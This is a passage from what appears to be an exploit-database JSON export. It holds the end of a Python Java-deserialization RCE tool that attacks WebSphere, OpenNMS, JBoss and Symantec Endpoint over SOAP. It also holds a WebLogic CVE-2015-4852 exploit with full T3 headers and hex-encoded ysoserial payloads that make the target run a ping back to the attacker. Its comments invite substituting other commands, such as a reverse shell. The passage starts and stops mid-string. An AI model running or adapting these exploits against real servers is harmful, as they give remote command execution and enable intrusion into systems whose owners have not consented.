xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r\n <operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r\n <params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r\n <signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r\n </ns1:invoke>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % 
('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r\n \"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r\n \"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r\n \"Content-length\":\"%d\" % len(body)\r\n }\r\n print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r\n resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\nif __name__ == \"__main__\":\r\n \r\n #\r\n # Main function\r\n #\r\n if not sys.version_info >= (3, 0):\r\n sys,exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r\n \r\n # Setup command line arguments\r\n cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v {version}\r\n \r\n Usage: python3 %(prog)s [options]\r\n \r\n Options:\r\n -t Target (required)\r\n -p Port (required)\r\n -c CMD (required)\r\n --serv Target Service (default: websphere)\r\n --ssl Use SSL (default: OFF)\r\n --test Test if target is vulnerable (default: OFF)\r\n \"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r\n cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r\n cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r\n cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r\n cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r\n cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for 
target service\")\r\n cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r\n \r\n cmdargs = cmdparser.parse_args()\r\n \r\n if cmdargs.test:\r\n answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r\n if answ.lower() == 'y' or answ.lower() == 'yes':\r\n print(\"[i] Awesome. Lets ask the target server to ping our system\")\r\n tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r\n if tgtos.lower == \"win\":\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Windows target selected. Sending \\'ping -n 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Unix target selected. Sending \\'ping -c 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r\n \r\n if cmdargs.serv == \"websphere\":\r\n print(\"[i] WebSphere selected as target app.\")\r\n if cmdargs.test:\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n elif cmdargs.serv == \"opennms\":\r\n print(\"[i] OpenNMS selected as target app.\")\r\n if cmdargs.test:\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. 
Exiting..\")\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n elif cmdargs.serv == \"jboss\":\r\n print(\"[i] JBoss selected as target app.\")\r\n if cmdargs.test:\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n print(\"[i] Symantec Endpoint selected as target app.\")\r\n if cmdargs.test:\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n \r\n print(\"[i] Thank you for using this tool. Contact author for any comments.\")\n\n# 0day.today [2018-04-30] #", "sourceHref": "https://0day.today/exploit/30269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T05:07:52", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "zdt", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-28T00:00:00", "id": "1337DAY-ID-28661", "href": "https://0day.today/exploit/description/28661", "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r\n# Date: [27/09/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r\n# Vulnerability Author: FoxGloveSecurity\r\n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r\n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r\n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running 
on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r\n# CVE : [CVE-2015-4852]\r\n \r\n'''\r\nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r\nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r\nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modifying the payload length each time you change the payload as \r\nthis script will do it for you on the fly.\r\n \r\nNote: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r\n'''\r\n \r\n#!/usr/bin/env python\r\nimport socket\r\nimport sys\r\nimport struct\r\nfrom binascii import unhexlify\r\n \r\nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r\nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\"\r\n \r\n#Both the target IP and the target port are required (argv[1] and argv[2])\r\nif len(sys.argv) < 3:\r\n print \"\\n[+]Please provide target IP and Port...\"\r\n print \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r\n sys.exit()\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_address = (sys.argv[1], int(sys.argv[2]))\r\nprint '[+]Connecting to %s port %s' % server_address\r\nsock.connect(server_address)\r\n \r\n#Send headers\r\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\r\nprint '[+]Sending\\n\"%s\"' % headers\r\nsock.sendall(headers)\r\n \r\ndata = sock.recv(1024)\r\nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data\r\n \r\n \r\n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r\n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial 
payload changes the length\r\nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r\n \r\n \r\n#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 
10.40.1.39' | xxd > yso.out\r\n#len(payload) is xxxx bytes\r\n#10.40.1.39 is the attacking IP in this case. Attacking IP should get ICMP Echo Request from the target.\r\n#This is the actual payload that pings back to attacking macine, this is Chunk#2 in the Payload.\r\n \r\n#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r\nchunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\
x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\
x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\
x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r\n \r\n \r\nchunk3 = 
'\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x6
